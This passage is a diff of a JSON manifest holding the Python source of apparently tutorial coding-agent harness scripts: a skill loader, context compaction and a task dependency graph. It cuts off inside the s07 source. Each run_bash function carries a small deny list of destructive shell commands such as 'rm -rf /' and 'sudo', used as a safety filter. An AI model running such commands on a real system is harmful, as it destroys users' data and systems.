def _load_all(self):\n if not self.skills_dir.exists():\n return\n for f in sorted(self.skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body, \"path\": str(f)}\n\n def _parse_frontmatter(self, text: str) -> tuple:\n \"\"\"Parse YAML frontmatter between --- delimiters.\"\"\"\n match = re.match(r\"^---\\n(.*?)\\n---\\n(.*)\", text, re.DOTALL)\n if not match:\n return {}, text\n try:\n meta = yaml.safe_load(match.group(1)) or {}\n except yaml.YAMLError:\n meta = {}\n return meta, match.group(2).strip()\n\n def get_descriptions(self) -> str:\n \"\"\"Layer 1: short descriptions for the system prompt.\"\"\"\n if not self.skills:\n return \"(no skills available)\"\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"No description\")\n tags = skill[\"meta\"].get(\"tags\", \"\")\n line = f\" - {name}: {desc}\"\n if tags:\n line += f\" [{tags}]\"\n lines.append(line)\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n \"\"\"Layer 2: full skill body returned in tool_result.\"\"\"\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'. Available: {', '.join(self.skills.keys())}\"\n return f\"\\n{skill['body']}\\n\"\n\n\nSKILL_LOADER = SkillLoader(SKILLS_DIR)\n\n# Layer 1: skill metadata injected into system prompt\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nUse load_skill to access specialized knowledge before tackling unfamiliar topics.\n\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"load_skill\", \"description\": \"Load specialized knowledge by name.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\", \"description\": \"Skill name to load\"}}, \"required\": [\"name\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms05 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s06", "filename": "s06_context_compact.py", "title": "Compact", "subtitle": "Three-Layer Compression", - "loc": 205, + "loc": 212, "tools": [ "bash", "read_file", @@ -287,58 +287,58 @@ { "name": "estimate_tokens", "signature": "def estimate_tokens(messages: list)", - "startLine": 61 + "startLine": 63 }, { "name": "micro_compact", "signature": "def micro_compact(messages: list)", - "startLine": 67 + "startLine": 69 }, { "name": "auto_compact", "signature": "def auto_compact(messages: list)", - "startLine": 97 + "startLine": 103 }, { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 124 + "startLine": 131 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 130 + "startLine": 137 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 142 + "startLine": 149 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 151 + "startLine": 158 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 160 + "startLine": 167 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 194 + "startLine": 201 } ], "layer": "memory", - "source": "#!/usr/bin/env python3\n\"\"\"\ns06_context_compact.py - Compact\n\nThree-layer compression pipeline so the agent can work forever:\n\n Every turn:\n +------------------+\n | Tool call result |\n +------------------+\n |\n v\n [Layer 1: micro_compact] (silent, every turn)\n Replace tool_result content older than last 3\n with \"[Previous: used {tool_name}]\"\n |\n v\n [Check: tokens > 50000?]\n | |\n no yes\n | |\n v v\n continue [Layer 2: auto_compact]\n Save full transcript to .transcripts/\n Ask LLM to summarize conversation.\n Replace all messages with [summary].\n |\n v\n [Layer 3: compact tool]\n Model calls compact -> immediate summarization.\n Same as auto, triggered manually.\n\nKey insight: \"The agent can forget strategically and keep working forever.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport time\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use tools to solve tasks.\"\n\nTHRESHOLD = 50000\nTRANSCRIPT_DIR = WORKDIR / \".transcripts\"\nKEEP_RECENT = 3\n\n\ndef estimate_tokens(messages: list) -> int:\n \"\"\"Rough token count: ~4 chars per token.\"\"\"\n return len(str(messages)) // 4\n\n\n# -- Layer 1: micro_compact - replace old tool results with placeholders --\ndef micro_compact(messages: list) -> list:\n # Collect (msg_index, part_index, tool_result_dict) for all tool_result entries\n tool_results = []\n for msg_idx, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for part_idx, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((msg_idx, part_idx, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n # Find tool_name for each result by matching tool_use_id in prior assistant messages\n tool_name_map = {}\n for msg in messages:\n if msg[\"role\"] == \"assistant\":\n content = msg.get(\"content\", [])\n if isinstance(content, list):\n for block in content:\n if hasattr(block, \"type\") and block.type == \"tool_use\":\n tool_name_map[block.id] = block.name\n # Clear old results (keep last KEEP_RECENT)\n to_clear = tool_results[:-KEEP_RECENT]\n for _, _, result in to_clear:\n if isinstance(result.get(\"content\"), str) and len(result[\"content\"]) > 100:\n tool_id = result.get(\"tool_use_id\", \"\")\n tool_name = tool_name_map.get(tool_id, \"unknown\")\n result[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n\n\n# -- Layer 2: auto_compact - save transcript, summarize, replace messages --\ndef auto_compact(messages: list) -> list:\n # Save full transcript to disk\n TRANSCRIPT_DIR.mkdir(exist_ok=True)\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n print(f\"[transcript saved: {transcript_path}]\")\n # Ask LLM to summarize\n conversation_text = json.dumps(messages, default=str)[:80000]\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity. Include: \"\n \"1) What was accomplished, 2) Current state, 3) Key decisions made. \"\n \"Be concise but preserve critical details.\\n\\n\" + conversation_text}],\n max_tokens=2000,\n )\n summary = response.content[0].text\n # Replace all messages with compressed summary\n return [\n {\"role\": \"user\", \"content\": f\"[Conversation compressed. Transcript: {transcript_path}]\\n\\n{summary}\"},\n {\"role\": \"assistant\", \"content\": \"Understood. I have the context from the summary. Continuing.\"},\n ]\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"compact\": lambda **kw: \"Manual compression requested.\",\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"compact\", \"description\": \"Trigger manual conversation compression.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"focus\": {\"type\": \"string\", \"description\": \"What to preserve in the summary\"}}}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n # Layer 1: micro_compact before each LLM call\n micro_compact(messages)\n # Layer 2: auto_compact if token estimate exceeds threshold\n if estimate_tokens(messages) > THRESHOLD:\n print(\"[auto_compact triggered]\")\n messages[:] = auto_compact(messages)\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n manual_compact = False\n for block in response.content:\n if block.type == \"tool_use\":\n if block.name == \"compact\":\n manual_compact = True\n output = \"Compressing...\"\n else:\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n # Layer 3: manual compact triggered by the compact tool\n if manual_compact:\n print(\"[manual compact]\")\n messages[:] = auto_compact(messages)\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms06 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: compression -- clean memory for infinite sessions.\n\"\"\"\ns06_context_compact.py - Compact\n\nThree-layer compression pipeline so the agent can work forever:\n\n Every turn:\n +------------------+\n | Tool call result |\n +------------------+\n |\n v\n [Layer 1: micro_compact] (silent, every turn)\n Replace non-read_file tool_result content older than last 3\n with \"[Previous: used {tool_name}]\"\n |\n v\n [Check: tokens > 50000?]\n | |\n no yes\n | |\n v v\n continue [Layer 2: auto_compact]\n Save full transcript to .transcripts/\n Ask LLM to summarize conversation.\n Replace all messages with [summary].\n |\n v\n [Layer 3: compact tool]\n Model calls compact -> immediate summarization.\n Same as auto, triggered manually.\n\nKey insight: \"The agent can forget strategically and keep working forever.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport time\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use tools to solve tasks.\"\n\nTHRESHOLD = 50000\nTRANSCRIPT_DIR = WORKDIR / \".transcripts\"\nKEEP_RECENT = 3\nPRESERVE_RESULT_TOOLS = {\"read_file\"}\n\n\ndef estimate_tokens(messages: list) -> int:\n \"\"\"Rough token count: ~4 chars per token.\"\"\"\n return len(str(messages)) // 4\n\n\n# -- Layer 1: micro_compact - replace old tool results with placeholders --\ndef micro_compact(messages: list) -> list:\n # Collect (msg_index, part_index, tool_result_dict) for all tool_result entries\n tool_results = []\n for msg_idx, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for part_idx, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((msg_idx, part_idx, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n # Find tool_name for each result by matching tool_use_id in prior assistant messages\n tool_name_map = {}\n for msg in messages:\n if msg[\"role\"] == \"assistant\":\n content = msg.get(\"content\", [])\n if isinstance(content, list):\n for block in content:\n if hasattr(block, \"type\") and block.type == \"tool_use\":\n tool_name_map[block.id] = block.name\n # Clear old results (keep last KEEP_RECENT). Preserve read_file outputs because\n # they are reference material; compacting them forces the agent to re-read files.\n to_clear = tool_results[:-KEEP_RECENT]\n for _, _, result in to_clear:\n if not isinstance(result.get(\"content\"), str) or len(result[\"content\"]) <= 100:\n continue\n tool_id = result.get(\"tool_use_id\", \"\")\n tool_name = tool_name_map.get(tool_id, \"unknown\")\n if tool_name in PRESERVE_RESULT_TOOLS:\n continue\n result[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n\n\n# -- Layer 2: auto_compact - save transcript, summarize, replace messages --\ndef auto_compact(messages: list) -> list:\n # Save full transcript to disk\n TRANSCRIPT_DIR.mkdir(exist_ok=True)\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n print(f\"[transcript saved: {transcript_path}]\")\n # Ask LLM to summarize\n conversation_text = json.dumps(messages, default=str)[-80000:]\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity. Include: \"\n \"1) What was accomplished, 2) Current state, 3) Key decisions made. \"\n \"Be concise but preserve critical details.\\n\\n\" + conversation_text}],\n max_tokens=2000,\n )\n summary = next((block.text for block in response.content if hasattr(block, \"text\")), \"\")\n if not summary:\n summary = \"No summary generated.\"\n # Replace all messages with compressed summary\n return [\n {\"role\": \"user\", \"content\": f\"[Conversation compressed. Transcript: {transcript_path}]\\n\\n{summary}\"},\n ]\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"compact\": lambda **kw: \"Manual compression requested.\",\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"compact\", \"description\": \"Trigger manual conversation compression.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"focus\": {\"type\": \"string\", \"description\": \"What to preserve in the summary\"}}}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n # Layer 1: micro_compact before each LLM call\n micro_compact(messages)\n # Layer 2: auto_compact if token estimate exceeds threshold\n if estimate_tokens(messages) > THRESHOLD:\n print(\"[auto_compact triggered]\")\n messages[:] = auto_compact(messages)\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n manual_compact = False\n for block in response.content:\n if block.type == \"tool_use\":\n if block.name == \"compact\":\n manual_compact = True\n output = \"Compressing...\"\n else:\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n # Layer 3: manual compact triggered by the compact tool\n if manual_compact:\n print(\"[manual compact]\")\n messages[:] = auto_compact(messages)\n return\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms06 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s07", "filename": "s07_task_system.py", "title": "Tasks", "subtitle": "Task Graph + Dependencies", - "loc": 207, + "loc": 204, "tools": [ "bash", "read_file", @@ -360,44 +360,44 @@ "classes": [ { "name": "TaskManager", - "startLine": 46, - "endLine": 125 + "startLine": 47, + "endLine": 120 } ], "functions": [ { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 130 + "startLine": 125 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 136 + "startLine": 131 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 148 + "startLine": 143 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 157 + "startLine": 152 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 166 + "startLine": 161 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 209 + "startLine": 204 } ], "layer": "planning", - "source": "#!/usr/bin/env python3\n\"\"\"\ns07_task_system.py - Tasks\n\nTasks persist as JSON files in .tasks/ so they survive context compression.\nEach task has a dependency graph (blockedBy/blocks).\n\n .tasks/\n task_1.json {\"id\":1, \"subject\":\"...\", \"status\":\"completed\", ...}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\", ...}\n task_3.json {\"id\":3, \"blockedBy\":[2], \"blocks\":[], ...}\n\n Dependency resolution:\n +----------+ +----------+ +----------+\n | task 1 | --> | task 2 | --> | task 3 |\n | complete | | blocked | | blocked |\n +----------+ +----------+ +----------+\n | ^\n +--- completing task 1 removes it from task 2's blockedBy\n\nKey insight: \"State that survives compression -- because it's outside the conversation.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTASKS_DIR = WORKDIR / \".tasks\"\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use task tools to plan and track work.\"\n\n\n# -- TaskManager: CRUD with dependency graph, persisted as JSON files --\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def _max_id(self) -> int:\n ids = [int(f.stem.split(\"_\")[1]) for f in self.dir.glob(\"task_*.json\")]\n return max(ids) if ids else 0\n\n def _load(self, task_id: int) -> dict:\n path = self.dir / f\"task_{task_id}.json\"\n if not path.exists():\n raise ValueError(f\"Task {task_id} not found\")\n return json.loads(path.read_text())\n\n def _save(self, task: dict):\n path = self.dir / f\"task_{task['id']}.json\"\n path.write_text(json.dumps(task, indent=2))\n\n def create(self, subject: str, description: str = \"\") -> str:\n task = {\n \"id\": self._next_id, \"subject\": subject, \"description\": description,\n \"status\": \"pending\", \"blockedBy\": [], \"blocks\": [], \"owner\": \"\",\n }\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n\n def get(self, task_id: int) -> str:\n return json.dumps(self._load(task_id), indent=2)\n\n def update(self, task_id: int, status: str = None,\n add_blocked_by: list = None, add_blocks: list = None) -> str:\n task = self._load(task_id)\n if status:\n if status not in (\"pending\", \"in_progress\", \"completed\"):\n raise ValueError(f\"Invalid status: {status}\")\n task[\"status\"] = status\n # When a task is completed, remove it from all other tasks' blockedBy\n if status == \"completed\":\n self._clear_dependency(task_id)\n if add_blocked_by:\n task[\"blockedBy\"] = list(set(task[\"blockedBy\"] + add_blocked_by))\n if add_blocks:\n task[\"blocks\"] = list(set(task[\"blocks\"] + add_blocks))\n # Bidirectional: also update the blocked tasks' blockedBy lists\n for blocked_id in add_blocks:\n try:\n blocked = self._load(blocked_id)\n if task_id not in blocked[\"blockedBy\"]:\n blocked[\"blockedBy\"].append(task_id)\n self._save(blocked)\n except ValueError:\n pass\n self._save(task)\n return json.dumps(task, indent=2)\n\n def _clear_dependency(self, completed_id: int):\n \"\"\"Remove completed_id from all other tasks' blockedBy lists.\"\"\"\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n\n def list_all(self) -> str:\n tasks = []\n for f in sorted(self.dir.glob(\"task_*.json\")):\n tasks.append(json.loads(f.read_text()))\n if not tasks:\n return \"No tasks.\"\n lines = []\n for t in tasks:\n marker = {\"pending\": \"[ ]\", \"in_progress\": \"[>]\", \"completed\": \"[x]\"}.get(t[\"status\"], \"[?]\")\n blocked = f\" (blocked by: {t['blockedBy']})\" if t.get(\"blockedBy\") else \"\"\n lines.append(f\"{marker} #{t['id']}: {t['subject']}{blocked}\")\n return \"\\n\".join(lines)\n\n\nTASKS = TaskManager(TASKS_DIR)\n\n\n# -- Base tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return 